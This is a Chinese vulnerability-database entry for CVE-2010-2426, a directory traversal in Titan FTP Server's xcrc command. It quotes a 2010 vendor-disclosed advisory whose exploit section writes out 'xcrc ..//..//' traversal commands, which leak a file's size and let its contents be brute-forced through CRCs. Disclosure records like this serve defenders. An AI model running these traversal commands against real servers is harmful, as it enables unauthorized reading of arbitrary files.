South River Technologies Titan FTP Server TitanFTPd目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1179082 漏洞类型 路径遍历
发布时间 2010-06-25 更新时间 2010-06-25
CVE编号 CVE-2010-2426 CNNVD-ID CNNVD-201006-389
漏洞平台 N/A CVSS评分 4.0
|漏洞来源
https://cxsecurity.com/issue/WLB-2010060194
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-389
|漏洞详情
SouthRiverTechnologiesTitanFTPServer8.10.1125以及早期版本的TitanFTPd存在目录遍历漏洞。远程认证用户可以借助xcrc命令中的"..//"序列符读取任意文件,确定文件大小。
|漏洞EXP
Accensus Security Advisory L-02 TitanFtp Server Arbitrary File Disclosure

Details

=============

Product: TitanFTP Server

Security-Risk: high

Remote-Exploit: maybe, assuming anonymous ftp access

Local-Exploit: yes

Vendor URL: http://www.southrivertech.com/

Found By: Bill Finlayson

http://www.accensussecurity.com

Affected: Versions 8.10.1125 and likely previous

Issue:  the xcrc command is susceptible to a directory traversal attack which will allow disclosure of the contents of any file on the server

Details: xcrc ..//..//..//..//a.txt 1 <some huge number> will disclose the file's size

xcrc ..//..//..//..//a.txt 1 2

xcrc ..//..//..//..//a.txt 1 3

...

xcrc ..//..//..//..//a.txt 1 <filesize>

when automated allows for an easy brute force attack on the crc's

Status: Submitted to Vendor 6/14/10 fixed 6/15/10

|参考资料

来源:XF
名称:tfs-xcrc-dir-traversal(59492)
链接:http://xforce.iss.net/xforce/xfdb/59492
来源:BID
名称:40949
链接:http://www.securityfocus.com/bid/40949
来源:BUGTRAQ
名称:20100615TitanFTPServerArbitraryFileDisclosure
链接:http://www.securityfocus.com/archive/1/archive/1/511839/100/0/threaded
来源:SECUNIA
名称:40237
链接:http://secunia.com/advisories/40237
来源:OSVDB
名称:65533
链接:http://osvdb.org/65533